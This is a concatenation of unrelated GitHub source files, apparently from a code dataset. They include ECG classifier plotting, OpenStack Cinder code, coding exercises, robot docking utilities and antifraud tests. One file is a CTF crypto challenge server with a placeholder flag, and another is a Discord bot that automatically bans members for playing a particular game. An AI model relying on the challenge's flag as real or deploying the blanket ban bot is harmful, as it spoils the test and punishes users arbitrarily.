fig.savefig(\"lstm.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"lstm.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n attn_model = RNNAttentionModel(1, 64, 'lstm', False).to(config.device)\n attn_model.load_state_dict(\n torch.load(config.attn_state_path,\n map_location=config.device)\n );\n attn_model.eval();\n logs = pd.read_csv(config.attn_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN+LSTM+Attention Model', fontsize=18)\n\n plt.tight_layout()\n fig.savefig(\"attn.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"attn.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n # ## Experiments and Results for Test Stage\n\n test_df = pd.read_csv(config.test_csv_path)\n print(test_df.shape)\n test_dataset = ECGDataset(test_df)\n test_dataloader = DataLoader(dataset=test_dataset, batch_size=96, num_workers=0, shuffle=False)\n\n models = [cnn_model, lstm_model, attn_model]\n\n # ### cnn model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[0])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", \"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"cnn_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"cnn_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### cnn+lstm model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[1])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", 
\"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN+LSTM Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"lstm_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"lstm_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### cnn+lstm+attention model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[2])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", \"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN+LSTM+Attention Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"attn_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"attn_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### Ensemble of all models\n\n y_pred = np.zeros((y_pred.shape[0], 5), dtype=np.float32)\n for i, model in enumerate(models, 1):\n y_pred_, y_true = make_test_stage(test_dataloader, model, True)\n y_pred += y_pred_\n y_pred /= i\n y_pred = np.argmax(y_pred, axis=1)\n\n clf_report = classification_report(y_pred,\n y_true,\n labels=[0, 1, 2, 3, 4],\n target_names=list(id_to_label.values()), # ['N', 'S', 'V', 'F', 'Q'],\n output_dict=True)\n\n plt.figure(figsize=(10, 8))\n ax = sns.heatmap(pd.DataFrame(clf_report).iloc[:-1, :].T, annot=True)\n ax.set_xticklabels(ax.get_xticklabels(), fontsize=15)\n ax.set_yticklabels(ax.get_yticklabels(), fontsize=12, rotation=0)\n plt.title(\"Ensemble Classification Report\", fontsize=20)\n plt.savefig(f\"ensemble result.svg\", format=\"svg\", bbox_inches='tight', pad_inches=0.2)\n plt.savefig(f\"ensemble result.png\", format=\"png\", bbox_inches='tight', pad_inches=0.2)\n 
clf_report\n","repo_name":"kuai364354200/ECG","sub_path":"ecg-classification-cnn-lstm-attention-mec-5ae284.py","file_name":"ecg-classification-cnn-lstm-attention-mec-5ae284.py","file_ext":"py","file_size_in_byte":31273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9579966005","text":"from cinder.api import microversions as mv\nfrom cinder.api.views import backups as views_v2\nfrom cinder.common import constants as cinder_constants\n\n\nclass ViewBuilder(views_v2.ViewBuilder):\n    \"\"\"Model a backups API V3 response as a python dictionary.\"\"\"\n\n    def detail(self, request, backup):\n        \"\"\"Detailed view of a single backup.\"\"\"\n        backup_ref = super(ViewBuilder, self).detail(request, backup)\n\n        # Add metadata if min version is greater than or equal to\n        # BACKUP_METADATA.\n        req_version = request.api_version_request\n        if req_version.matches(mv.BACKUP_METADATA):\n            backup_ref['backup']['metadata'] = backup.metadata\n\n        if req_version.matches(mv.ENCRYPTION_KEY_ID_IN_DETAILS, None):\n            encryption_key_id = backup.get('encryption_key_id', None)\n            if (encryption_key_id and\n                    encryption_key_id != cinder_constants.FIXED_KEY_ID):\n                backup_ref['backup']['encryption_key_id'] = encryption_key_id\n\n        return backup_ref\n","repo_name":"openstack/cinder","sub_path":"cinder/api/v3/views/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"18080131906","text":"'''\n4. Define an Employee class with the following requirements:\n(1) Attributes: id, name, salary\n(2) Overload the + operator: adding two objects returns the sum of their salaries by default\n(3) Constructor: takes name and salary but not id. The id auto-increments from 1000, so the first new object is 1001 and the second is 1002.\n(4) For the salary attribute, use @property to define the getter and setter. The setter accepts only numbers in the range 1000-50000.\n'''\n\nclass Employee:\n\n    id = 1000\n    \n    def __init__(self,name,salary):\n        self.name = name\n        self.__salary = salary\n        Employee.id += 1\n\n    @property\n    def salary(self):\n        return self.__salary\n    \n    @salary.setter\n    def salary(self,salary):\n        if 1000 Optional[ListNode]:\n        \"\"\"\n        Simply compute the sum and build a new list\n        \"\"\"\n        s1, s2 = 0, 0\n        p1, p2 = l1, l2\n        while p1:\n            s1 = s1* 10 + p1.val\n            p1 = p1.next\n        while p2:\n            s2 = s2* 10 + p2.val\n            p2 = p2.next\n        p = head = ListNode()\n        for c in str(s1+s2):\n            p.next = ListNode(int(c))\n            p = p.next\n        return head.next\n    \n    \n\nclass Solution:\n    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n        def expandListFront(node: ListNode, length: int, val: int) -> ListNode:\n            for _ in range(length):\n                temp = ListNode(val)\n                temp.next = node\n                node = temp\n            return node\n\n        # Return the carry, and write the digit result into the cur1 linked list.\n        def addCurrentNode(cur1: ListNode, cur2: ListNode) -> int:\n            carry = 0\n            if cur1.next and cur2.next:\n                carry = addCurrentNode(cur1.next, cur2.next)\n            s = cur1.val + cur2.val + carry\n            cur1.val = s % 10\n            return s // 10\n\n        n1, cur1, n2, cur2 = 0, l1, 0, l2\n        while cur1:\n            cur1, n1 = cur1.next, n1 + 1\n        while cur2:\n            cur2, n2 = cur2.next, n2 + 1\n        if n1 < n2:\n            l1 = expandListFront(l1, n2 - n1, 0)\n        else:\n            l2 = expandListFront(l2, n1 - n2, 0)\n\n        carry = addCurrentNode(l1, l2)\n        if carry == 1:\n            l1 = expandListFront(l1, 1, 1)\n        return l1\n","repo_name":"hanwgyu/algorithm_problem_solving","sub_path":"Leetcode/Add_Two_Numbers_II.py","file_name":"Add_Two_Numbers_II.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70498149331","text":"#!/usr/bin/env 
python3\nfrom os import urandom\nfrom random import choices\nfrom hashlib import sha256\nimport signal\nimport string\nimport sys\n\n# from flag import FLAG\n\n\ndef getrandbits(bit):\n return int.from_bytes(urandom(bit >> 3), \"big\")\n\n\ndef proof_of_work() -> bool:\n alphabet = string.ascii_letters + string.digits\n nonce = \"\".join(choices(alphabet, k=8))\n nonce = '00000000' \n print(f'SHA256(\"{nonce}\" + ?) starts with \"00000\"')\n suffix = input().strip()\n message = (nonce + suffix).encode(\"Latin-1\")\n return sha256(message).digest().hex().startswith(\"00000\")\n\n\ndef main():\n # signal.alarm(60)\n # if not proof_of_work():\n # return\n \n secret = getrandbits(1024)\n print(\"Listen...The secret iz...M2@9c0f*#aF()I!($Ud3;J...\"\n \"Hello?...really noisy here again...God bless you get it...\")\n for i in range(64):\n try:\n op = input().strip()\n num = input().strip()\n except EOFError:\n return\n if not str.isnumeric(num):\n print(\"INVALID NUMBER\")\n continue\n num = int(num)\n if op == 'god':\n print(num * getrandbits(992) % secret)\n elif op == 'bless':\n if num == secret:\n\n try:\n from datetime import datetime\n except Exception as e:\n FLAG = \"but something is error. Please contact the admin.\"\n\n print(\"SYC{123321}\")\n return\n print(\"WRONG SECRET\")\nmain()\n","repo_name":"ljahum/crypto-challenges","sub_path":"2020归档/ByteCTF/noise/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27162803849","text":"import sys\nfrom app.main.jobs.tools_runner.console_parameters import ConsoleToolParameters\n\n\nclass AccuracyCheckerCliParameters(ConsoleToolParameters):\n\n def __init__(self):\n super(AccuracyCheckerCliParameters, self).__init__()\n self.path = sys.executable\n\n def __str__(self, parameter_prefix='-'):\n if not self.exe:\n raise AssertionError('Name of application did not set')\n exe_path = self.path + ' ' + self.exe\n params = ' '.join(\n ['{p}{k} {v}'.format(p=parameter_prefix, k=key, v=value) for key, value in self.params.items()])\n return exe_path + ' ' + params\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/tools/workbench/app/main/console_tool_wrapper/accuracy_tools/accuracy_cli_parameters.py","file_name":"accuracy_cli_parameters.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"74022466770","text":"import math\nfrom typing import Tuple, List\nimport numpy as np\n\nimport tf\nfrom tf import transformations as ts\n\nfrom geometry_msgs.msg import TransformStamped\nfrom nav_msgs.msg import Odometry\nfrom autodock_core.msg import AutoDockingFeedback\n\n\n##############################################################################\n\nPose2D = Tuple[float, float, float]\n\n\nclass DockState:\n INVALID = AutoDockingFeedback.STATE_INVALID\n IDLE = AutoDockingFeedback.STATE_IDLE\n PREDOCK = AutoDockingFeedback.STATE_PREDOCK\n PARALLEL_CORRECTION = AutoDockingFeedback.STATE_PARALLEL_CORRECTION\n STEER_DOCK = AutoDockingFeedback.STATE_STEER_DOCK\n LAST_MILE = AutoDockingFeedback.STATE_LAST_MILE\n ACTIVATE_CHARGER = AutoDockingFeedback.STATE_ACTIVATE_CHARGER\n RETRY = AutoDockingFeedback.STATE_RETRY\n PAUSE = AutoDockingFeedback.STATE_PAUSE\n\n def to_string(input):\n _map = {\n DockState.INVALID: 'INVALID',\n DockState.IDLE: 'IDLE',\n DockState.PREDOCK: 'PREDOCK',\n 
DockState.PARALLEL_CORRECTION: 'PARALLEL_CORRECTION',\n DockState.STEER_DOCK: 'STEER_DOCK',\n DockState.LAST_MILE: 'LAST_MILE',\n DockState.ACTIVATE_CHARGER: 'ACTIVATE_CHARGER',\n DockState.RETRY: 'RETRY',\n DockState.PAUSE: 'PAUSE'\n }\n return _map[input]\n\n def to_percent(input):\n \"\"\"\n Simple util to convert DockState to percent representation,\n use in publishing feedback in dock server\n \"\"\"\n _map = {\n DockState.IDLE: 0.0,\n DockState.PREDOCK: 0.15,\n DockState.PARALLEL_CORRECTION: 0.35,\n DockState.STEER_DOCK: 0.50,\n DockState.LAST_MILE: 0.8,\n DockState.ACTIVATE_CHARGER: 0.9,\n DockState.RETRY: 0.1,\n DockState.PAUSE: 0.1 # TODO\n }\n return _map[input]\n\n##############################################################################\n\n\ndef get_2d_inverse(pose_2d: Pose2D) -> Pose2D:\n \"\"\"\n Inverse a 2d transformation, mainly to switch the frame of reference\n :param tf1, tf2: 2d transformation\n :return: 2d tf of [x, y, yaw]\n \"\"\"\n _tr = (pose_2d[0], pose_2d[1], 0)\n _q = ts.quaternion_from_euler(0, 0, pose_2d[2])\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n _i_tf_mat = ts.inverse_matrix(_tf_mat)\n trans = ts.translation_from_matrix(_i_tf_mat)\n euler = ts.euler_from_matrix(_i_tf_mat)\n return trans[0], trans[1], euler[2]\n\n\ndef get_centre_tf(tf1: np.ndarray, tf2: np.ndarray, offset=0.0) -> Pose2D:\n \"\"\"\n Get centre point of both tf1 and tf2, Note that this output new frame\n has a different orientation as the marker, which it's frame is x axis\n (pointing out of the marker) is directed towards the robot's camera.\n :param tf1, tf2: 4x4 homogenous matrix from tf1 and tf2\n :param offset: (optional) offset target point to the normal\n :return: 2d tf of the centre [x, y, yaw]\n \"\"\"\n x1, y1, _ = get_2d_pose(tf1)\n x2, y2, _ = get_2d_pose(tf2)\n _x = (x1 + x2)/2\n _y = (y1 + y2)/2\n _yaw = -math.atan2((x2 - x1), (y2 - y1))\n _x += math.cos(_yaw)*offset\n _y += math.sin(_yaw)*offset\n # print(\"Inverse! 
\", get_2d_inverse((_x, _y, _yaw))) # for sanity check\n return _x, _y, _yaw\n\n\ndef get_mat_from_transfrom_msg(msg: TransformStamped) -> np.ndarray:\n \"\"\"\n This will return a homogenous transformation of transform msg\n :param : input transform msg\n :return : homogenous transformation matrix\n \"\"\"\n _rot = msg.transform.rotation\n _q = (_rot.x, _rot.y, _rot.z, _rot.w)\n\n _trans = msg.transform.translation\n _tr = (_trans.x, _trans.y, _trans.z)\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n return _tf_mat\n\n\ndef get_mat_from_odom_msg(msg: Odometry) -> np.ndarray:\n \"\"\"\n This will return a homogenous transformation of odom pose msg\n :param : input odom msg\n :return : homogenous transformation matrix\n \"\"\"\n _rot = msg.pose.pose.orientation\n _q = (_rot.x, _rot.y, _rot.z, _rot.w)\n _trans = msg.pose.pose.position\n _tr = (_trans.x, _trans.y, _trans.z)\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n return _tf_mat\n\n\ndef get_2d_pose(_tf: np.ndarray) -> Pose2D:\n \"\"\"\n :param: input homogenous matrix\n :return : 2dPose in x, y, yaw format\n \"\"\"\n trans = ts.translation_from_matrix(_tf)\n euler = ts.euler_from_matrix(_tf)\n return trans[0], trans[1], euler[2]\n\n\ndef apply_2d_transform(mat: np.ndarray, transform: Pose2D) -> np.ndarray:\n \"\"\"\n Apply a 2d transform to a homogenous matrix\n :param mat: the input 4x4 homogenous matrix\n :param transform : 2d transform which to apply to the mat\n :return : transformed homogenous transformation matrix\n \"\"\"\n # req target transformation from base\n q = tf.transformations.quaternion_from_euler(0, 0, transform[2])\n tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(\n (transform[0], transform[1], 0)), ts.quaternion_matrix(q))\n return np.matmul(mat, tf_mat)\n\n\ndef compute_tf_diff(current_tf: np.ndarray, ref_tf: np.ndarray) -> Pose2D:\n \"\"\"\n Find the diff of two transformation matrix\n :param : homogenous transformation of 2 matrices\n :return : the 2d planer trans fo the 2 inputs; [x, y, yaw]\n \"\"\"\n tf_diff = np.matmul(ts.inverse_matrix(current_tf), ref_tf)\n trans = ts.translation_from_matrix(tf_diff)\n euler = ts.euler_from_matrix(tf_diff)\n return trans[0], trans[1], euler[2]\n\n\ndef avg_2d_poses(poses: List[Pose2D]) -> Pose2D:\n \"\"\"\n Provide the average of a list of 2D poses\n :param poses : a list of 2d poses\n :return : output avg Pose2D\n \"\"\"\n _l = len(poses)\n if (_l == 0):\n return None\n _x = 0\n _y = 0\n _yaw = 0\n for pose in poses:\n _x += pose[0]\n _y += pose[1]\n _yaw += pose[2]\n return _x/_l, _y/_l, _yaw/_l\n\n\ndef sat_proportional_filter(\n input: float, abs_min=0.0, abs_max=10.0, factor=1) -> float:\n \"\"\"\n Simple saturated proportional filter\n :param input : input value\n :param abs_min and abs_max : upper and lower bound, abs value\n :param factor : multiplier factor for the input value\n :return : output filtered value, within boundary\n \"\"\"\n output = 0.0\n input *= factor\n if abs(input) < abs_min:\n if (input < 0):\n output = -abs_min\n else:\n output = abs_min\n elif abs(input) > abs_max:\n if (input > 0):\n output = abs_max\n else:\n output = -abs_max\n else:\n output = input\n return output\n\n\ndef bin_filter(input: float, abs_boundary: float) -> float:\n \"\"\"\n Simple binary filter, will provide abs_ceiling as a binary output,\n according to the 'negativity' of the input value\n :param input : input value\n :param abs_boundary : abs boundary value\n :return 
: output binary value\n    \"\"\"\n    output = abs(abs_boundary)\n    if input < 0:\n        output = -abs(abs_boundary)\n    return output\n\n\ndef flip_yaw(yaw: float) -> float:\n    \"\"\"\n    Flip yaw angle by 180 degrees, input yaw range should be within\n    [-pi, pi] radian. Else use set_angle() fn to fix the convention.\n    Output will also be within the same range of [-pi, pi] radian.\n    \"\"\"\n    if yaw >= 0:\n        return yaw - math.pi\n    else:\n        return yaw + math.pi\n\n\ndef set_angle(angle: float) -> float:\n    \"\"\"\n    Ensure the angle is within the range of [-pi, pi] radian convention\n    \"\"\"\n    return math.atan2(math.sin(angle), math.cos(angle))\n\n\ndef flip_base_frame(input: Pose2D):\n    \"\"\"\n    Flip the current reference frame by 180 degrees. As such, the negativity\n    of translation is flipped, and the yaw angle is located at the opposite\n    quadrant. Currently used to flip from 'back dock' to 'front dock'\n    \"\"\"\n    return -input[0], -input[1], flip_yaw(input[2])\n","repo_name":"osrf/autodock","sub_path":"autodock_core/scripts/autodock_core/autodock_utils.py","file_name":"autodock_utils.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"66"} +{"seq_id":"24148016016","text":"import time\n\nprint('Press ENTER to begin. Afterwards, press ENTER to \"click\" the stopwatch. Press \"cc\" to quit.')\ninput()\nprint('Started.')\nstarttime = time.time()\nlasttime = starttime\nlapNum = 1\n\ntry:\n    while True:\n        input_text = input()\n        if input_text == 'cc':\n            raise Exception('Done.')\n        # time taken by this lap\n        lapTime = round(time.time() - lasttime, 2)\n        # total elapsed time\n        totalTime = round(time.time() - starttime, 2)\n        print('Lap #%s: %s (%s)' % (lapNum, totalTime, lapTime))\n        lapNum += 1\n        lasttime = time.time()\nexcept Exception as err:\n    print(err)\n","repo_name":"qiyue0421/automate_the_boring_stuff_with_python","sub_path":"20190310_2.py","file_name":"20190310_2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73616672851","text":"valorCasa = float(input('Valor da casa (R$): '))\nsalario = float(input('Salário do comprador: '))\ntempo = int(input('Tempo para pagamento (anos): '))\nnParcelas = tempo * 12\nvrParcela = valorCasa / nParcelas\nif vrParcela / salario <= 0.30:\n    print('Proposta de financiamento: \\033[33m{} '\n          'parcelas mensais\\033[m de \\033[33mR$ {:.2f}\\033[m.'.format(nParcelas, vrParcela))\nelse:\n    print('Solicitação de financiamento \\033[31mnegada\\033[m.')\n","repo_name":"cassiorabelo/Estudonauta-Python","sub_path":"Desafios/a12d036 analFinanc.py","file_name":"a12d036 analFinanc.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5490713939","text":"import discord\nimport asyncio\nclient = discord.Client()\n@client.event\nasync def on_ready():\n\twhile 1:\n\t\tfor guild in client.guilds:\n\t\t\tfor member in guild.members:\n\t\t\t\tfor x in member.activities:\n\t\t\t\t\tif type(x) == discord.Game:\n\t\t\t\t\t\tprint(x)\n\t\t\t\t\t\tif str(x) == \"Geometry Dash\":\n\t\t\t\t\t\t\ta = await client.fetch_user(member.id)\n\t\t\t\t\t\t\tawait a.send(f'You have been banned from `{guild}`\\nReason: playing GD')\n\t\t\t\t\t\t\tawait guild.ban(member)\n\t\tawait 
asyncio.sleep(5)\nclient.run(\"TOKEN_HERE\")\n","repo_name":"xewoks/AntiGDBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34783202700","text":"from pico2d import *\r\nimport random\r\n\r\nclass Grass:\r\n    def __init__(self):\r\n        self.image = load_image('grass.png')\r\n        self.x, self.y = 400, 30\r\n    def draw(self):\r\n        self.image.draw(self.x, self.y)\r\n\r\n    def update(self):\r\n        pass\r\n\r\nclass Boy:\r\n    def __init__(self):\r\n        self.x, self.y = 100, 90\r\n        self.image = load_image('run_animation.png')\r\n        self.frame = 0\r\n\r\n    def draw(self):\r\n        sx = self.frame * 100\r\n        self.image.clip_draw(sx, 0, 100, 100, self.x, self.y)\r\n\r\n    def update(self):\r\n        self.frame = (self.frame + 1) % 8\r\n        self.x += 1\r\n\r\ndef handle_events():\r\n    global loop\r\n    events = get_events()\r\n    for e in events:\r\n        if e.type == SDL_QUIT:\r\n            loop = False # end the game loop \r\n        elif e.type == SDL_KEYDOWN:\r\n            if e.key == SDLK_ESCAPE:\r\n                loop = False\r\n\r\nopen_canvas()\r\n\r\ng = Grass()\r\nboys = [Boy() for i in range(11)]\r\nx = 100\r\nfor b in boys:\r\n    b.x = x\r\n    x += 50\r\n\r\nloop = True\r\nwhile (loop):\r\n    #b.update()\r\n    for b in boys: \r\n        b.update()\r\n\r\n    clear_canvas()\r\n\r\n    g.draw()\r\n    for b in boys:\r\n        b.draw()\r\n\r\n    update_canvas()\r\n    handle_events()\r\n\r\n    delay(0.03) \r\n\r\nclose_canvas()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"surimLee/Python_study_","sub_path":"game6.py","file_name":"game6.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33556070432","text":"import pytest\n\nfrom test_taxi_antifraud.utils import utils\n\n\n@pytest.mark.parametrize(\n    'params',\n    [\n        ({'order_id': 'not_existing_value'}),\n        ({'phone_id': 'not_existing_value'}),\n        ({'personal_phone_id': 'not_existing_value'}),\n    ],\n)\nasync def test_get_antifake_triggering_no_data(web_app_client, params):\n    response = await web_app_client.get(\n        '/v1/get_antifake_triggering_list', params=params,\n    )\n    assert response.status == 200\n\n    assert await response.json() == []\n\n\n@pytest.mark.parametrize(\n    'params',\n    [\n        ({}),\n        ({'phone_id': 'some_value', 'order_id': 'some_value'}),\n        ({'order_id': 'some_value', 'personal_phone_id': 'some_value'}),\n        (\n            {\n                'order_id': 'some_value',\n                'personal_phone_id': 'some_value',\n                'phone_id': 'some_value',\n            }\n        ),\n    ],\n)\nasync def test_get_antifake_triggering_bad_request(web_app_client, params):\n    response = await web_app_client.get(\n        '/v1/get_antifake_triggering_list', params=params,\n    )\n    assert response.status == 400\n\n\n@pytest.mark.parametrize(\n    'params,expected',\n    [\n        (\n            {'phone_id': 'some_phone_id'},\n            [\n                {\n                    'order_id': 'some_order',\n                    'device_id': 'some_device',\n                    'user_id': 'some_user',\n                    'personal_phone_id': 'some_personal',\n                    'triggered_rules': ['some_rule', 'another_rule'],\n                    'triggering_time': '2019-12-20T09:05:39.000Z',\n                    'phone_id': 'some_phone_id',\n                },\n            ],\n        ),\n        (\n            {'order_id': 'some_order'},\n            [\n                {\n                    'order_id': 'some_order',\n                    'device_id': 'some_device',\n                    'user_id': 'some_user',\n                    'personal_phone_id': 'some_personal',\n                    'triggered_rules': ['some_rule', 'another_rule'],\n                    'triggering_time': '2019-12-20T09:05:39.000Z',\n                    'phone_id': 'some_phone_id',\n                },\n            ],\n        ),\n        (\n            {'personal_phone_id': 'some_personal'},\n            [\n                {\n                    'order_id': 'some_order',\n                    'device_id': 'some_device',\n                    
'user_id': 'some_user',\n                    'personal_phone_id': 'some_personal',\n                    'triggered_rules': ['some_rule', 'another_rule'],\n                    'triggering_time': '2019-12-20T09:05:39.000Z',\n                    'phone_id': 'some_phone_id',\n                },\n                {\n                    'order_id': 'some_order1',\n                    'device_id': 'some_device1',\n                    'metrica_device_id': 'metrica_id',\n                    'user_id': 'some_user1',\n                    'personal_phone_id': 'some_personal',\n                    'triggered_rules': ['some_rule1'],\n                    'triggering_time': '2019-12-21T09:05:39.000Z',\n                    'phone_id': 'some_phone_id1',\n                    'orders_total': 45,\n                    'orders_complete': 0,\n                },\n            ],\n        ),\n    ],\n)\nasync def test_get_antifake_triggering_base(web_app_client, params, expected):\n    response = await web_app_client.get(\n        '/v1/get_antifake_triggering_list', params=params,\n    )\n    assert response.status == 200\n\n    result = utils.convert_datetimes(\n        await response.json(), ['triggering_time'],\n    )\n    expected = utils.convert_datetimes(expected, ['triggering_time'])\n\n    assert result == expected\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_taxi_antifraud/antifake_triggering/test_get_antifake_triggering_info.py","file_name":"test_get_antifake_triggering_info.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26565987069","text":"import json\nfrom PIL import Image, ImageDraw, ImageFont\n\nW = 1200\nH = 630\n\n# Open fonts\ntimes_120 = ImageFont.truetype('/mnt/c/Windows/Fonts/times.ttf', 120)\narial_black_40 = ImageFont.truetype('/mnt/c/Windows/Fonts/ariblk.ttf', 40)\narial_black_52 = ImageFont.truetype('/mnt/c/Windows/Fonts/ariblk.ttf', 52)\n\n# Open TOC JSON\ntoc_data = None\nwith open('_data/toc.json') as f:\n    toc_data = json.load(f)\n\ndef CreateImageDirect(title, problem_title, location):\n    # Create Image\n    img = Image.new('RGB', (W, H), color = (255, 255, 255))\n    d = ImageDraw.Draw(img)\n\n    # Write texts\n    d.rectangle([W/2 - 260, 50, W/2 + 260, 120], fill = (71, 41, 163))\n    d.text((W/2, 100), \"CLRS SOLUTIONS\", font=arial_black_40, fill = (255, 255, 255), anchor=\"ms\")\n    d.text((W/2, 180), problem_title, font=arial_black_52, fill = (45, 25, 120), anchor=\"ms\")\n    d.rectangle([W/2 - 260, 120, W/2 + 260, 200], outline = (71, 41, 163), width=4)\n    d.text((W/2, 360), title, font=times_120, fill = (0, 0, 0), align=\"center\", anchor=\"ms\", spacing=20)\n\n    # Save image\n    